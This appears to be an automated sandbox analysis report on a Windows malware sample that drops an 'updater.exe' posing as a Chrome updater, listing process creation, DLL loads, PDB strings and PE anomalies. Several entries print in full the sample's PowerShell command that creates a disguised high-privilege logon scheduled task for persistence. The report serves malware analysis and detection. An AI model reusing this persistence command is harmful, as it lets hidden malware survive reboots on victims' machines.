                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: unknown unknownJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: h2qWqtD73F.exeStatic PE information: Image base 0x140000000 > 0x60000000
                Source: h2qWqtD73F.exeStatic file information: File size 5980672 > 1048576
                Source: h2qWqtD73F.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x592e00
                Source: h2qWqtD73F.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: @C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: mbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831* source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct4AB9.tmp.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct8ACF.tmp.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 00000014.00000002.1586148880.00007FF6DD49B000.00000004.00000001.01000000.00000008.sdmp
                Source: Binary string: (@C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb*6 source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wz.pdB source: h2qWqtD73F.exe, 00000000.00000002.1416245582.00000200354F0000.00000004.00000001.00020000.00000000.sdmp, h2qWqtD73F.exe, 00000000.00000000.1297247842.00007FF752A5B000.00000008.00000001.01000000.00000003.sdmp, h2qWqtD73F.exe, 00000000.00000002.1417375531.00007FF752A80000.00000008.00000001.01000000.00000003.sdmp, updater.exe, 00000014.00000000.1417205334.00007FF6DD49B000.00000008.00000001.01000000.00000008.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.error source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: \user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A583109edcd source: svchost.exe, 00000011.00000002.2628095786.0000020628040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413494043.0000020628040000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831~1 source: svchost.exe, 00000011.00000002.2628095786.0000020628040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413494043.0000020628040000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbF source: svchost.exe, 00000011.00000002.2628095786.0000020628040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413494043.0000020628040000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.error source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wz.pdBk source: h2qWqtD73F.exe, 00000000.00000002.1416245582.00000200354F0000.00000004.00000001.00020000.00000000.sdmp, h2qWqtD73F.exe, 00000000.00000000.1297247842.00007FF752A5B000.00000008.00000001.01000000.00000003.sdmp, h2qWqtD73F.exe, 00000000.00000002.1417375531.00007FF752A80000.00000008.00000001.01000000.00000003.sdmp, updater.exe, 00000014.00000000.1417205334.00007FF6DD49B000.00000008.00000001.01000000.00000008.sdmp
                Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831d0 source: svchost.exe, 00000011.00000000.1413550967.0000020628056000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2628917838.0000020628056000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbl source: svchost.exe, 00000011.00000002.2626315265.000002062802B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1413437595.000002062802B000.00000004.00000001.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeUnpacked PE file: 20.2.updater.exe.28471390000.1.unpack
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }
                Source: C:\Users\user\Desktop\h2qWqtD73F.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#polrad#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; }Jump to behavior
                Source: h2qWqtD73F.exeStatic PE information: real checksum: 0x5c2518 should be: 0x5b7873
                Source: piukhnngkvtj.tmp.0.drStatic PE information: real checksum: 0x27db6 should be: 0x2d110
                Source: updater.exe.0.drStatic PE information: real checksum: 0x5c2518 should be: 0x5b7873
                Source: h2qWqtD73F.exeStatic PE information: section name: .xdata
